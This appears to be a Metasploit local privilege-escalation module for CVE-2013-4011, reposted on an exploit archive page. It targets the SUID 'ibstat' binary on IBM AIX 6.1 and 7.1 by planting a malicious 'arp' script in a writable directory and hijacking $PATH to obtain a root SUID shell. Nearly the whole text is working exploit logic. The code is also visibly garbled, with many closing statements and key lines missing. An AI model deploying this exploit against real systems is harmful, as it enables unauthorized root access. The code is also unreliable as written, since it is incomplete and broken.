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ibstat $PATH Privilege Escalation
来源:metasploit.com 作者:Lintovois 发布时间:2014-04-08  
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  def initialize(info = {})
      "Name" => "ibstat $PATH Privilege Escalation",
      "Description" => %q{
        This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
      "Author" => [
        "Kristian Erik Hermansen", #original author
        "Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module
        "Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module
      "References" => [
        ["CVE", "2013-4011"],
        ["OSVDB", "95420"],
        ["BID", "61287"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
        ["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
      "Platform" => ["unix"],
      "Arch" => ARCH_CMD,
      "Payload" => {
        "Compat" => {
          "PayloadType" => "cmd",
          "RequiredCmd" => "perl"
      "Targets" => [
        ["IBM AIX Version 6.1", {}],
        ["IBM AIX Version 7.1", {}]
      "DefaultTarget" => 1,
      "DisclosureDate" => "Sep 24 2013"
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ], self.class)
  def check
    find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
    if find_output.include?("ibstat")
      return Exploit::CheckCode::Vulnerable
  def exploit
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
      print_good("Target is vulnerable.")
    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    arp_file = "#{datastore["WritableDir"]}/arp"
    c_file = %Q^#include <stdio.h>
int main()
   return 0;
    arp = %Q^#!/bin/sh
chown root #{root_file}
chmod 4555 #{root_file}
    if gcc_installed?
      print_status("Dropping file #{root_file}.c...")
      write_file("#{root_file}.c", c_file)
      print_status("Compiling source...")
      cmd_exec("gcc -o #{root_file} #{root_file}.c")
      print_status("Compilation completed")
      cmd_exec("cp /bin/sh #{root_file}")
    print_status("Writing custom arp file...")
    cmd_exec("chmod 0555 #{arp_file}")
    print_status("Custom arp file written")
    print_status("Updating $PATH environment variable...")
    path_env = cmd_exec("echo $PATH")
    cmd_exec("export PATH")
    print_status("Triggering vulnerablity...")
    cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")
    # The $PATH variable must be restored before the payload is executed
    # in cases where an euid root shell was gained
    print_status("Restoring $PATH environment variable...")
    cmd_exec("export PATH")
    print_status("Checking root privileges...")
    if is_root?
      print_status("Executing payload...")
  def gcc_installed?
    print_status("Checking if gcc exists...")
    gcc_whereis_output = cmd_exec("whereis -b gcc")
    if gcc_whereis_output.include?("/")
      print_good("gcc found!")
      return true
    print_status("gcc not found. Using /bin/sh from local system")
  def is_root?
    id_output = cmd_exec("id")
    if id_output.include?("euid=0(root)")
      print_good("Got root! (euid)")
      return true
    if id_output.include?("uid=0(root)")
      print_good("Got root!")
      return true
    print_status("Exploit failed")

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